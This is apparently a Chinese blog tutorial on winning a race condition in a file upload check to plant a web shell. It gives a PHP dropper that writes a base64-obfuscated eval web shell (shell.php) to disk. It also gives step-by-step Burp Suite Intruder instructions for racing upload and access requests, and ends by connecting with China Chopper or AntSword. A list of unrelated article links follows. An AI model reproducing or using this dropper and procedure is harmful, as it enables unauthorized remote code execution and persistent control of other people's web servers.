文件上传之条件竞争
2023-02-18 16:29:31 时间
文件上传之条件竞争
原理:先保存文件
查看文件是否符合条件
满足(保留文件并重命名)
不满足(删除文件)
我们上传文件要在保存文件后在他被删除之前访问到他,所以访问速度一定要快,使用burpsuite的intruder功能来重复访问和发送。
第一步、正常上传,查看文件保存目录
第二步、抓包,抓取上传木马的包,发送到intruder,重复发包。
木马要能生小马,这样我们访问木马(a.php),木马就会生下小马(shell.php),木马会被删除但是小马会被留下。
1 //PHP大马生小马 2 <?php 3 $a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'; 4 $myfile = fopen("shell.php", "w"); 5 fwrite($myfile, base64_decode($a)); 6 fclose($myfile); 7 ?>
第三步、再去抓取访问木马(a.php)的包,发送到intruder
第四步、重复发送和访问,知道木马生成小马(访问状态200)
打开intruder,攻击类型选择Sniper,清除符号(我这个是汉化版的,英文版的跟这对应)
另一个也是如此
第五步、开始重复访问,开始重复发送,先开始访问,再开始发送
发现有200状态,说明木马已经生成小马
第六步、进行连接用中国菜刀或者中国蚁剑都可以
相关文章
- Redis分布式锁的10个坑
- 如何解决 Redis 数据倾斜、热点等问题
- 免费给自己的网站加 HTTPS
- iterm2 快捷键(转载)
- Too many authentication failures for xxxx_username
- peewee insert 数据时报错:'buffer' object has no attribute 'translate'
- virtualenv 虚拟环境报错:setuptools pip wheel failed with error code 1
- supervisor 安装、配置、常用命令
- _ssl.c:510: error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure
- [MySQL]支持 emoji(字符集问题)
- [MySQL]长连接和短链接(转载)
- 解决 InsecurePlatformWarning: A true SSLContext object is not available.
- Mac总是自动启动脚本
- Max retries exceeded with url
- brew tap homebrew-science fails
- 持续集成是什么?(转载)
- [编辑器]vim常用操作
- Mac下中文输入法突然没了选字框
- install dm.xmlsec.binding 失败
- [MySQL]创建数据库以及设置编码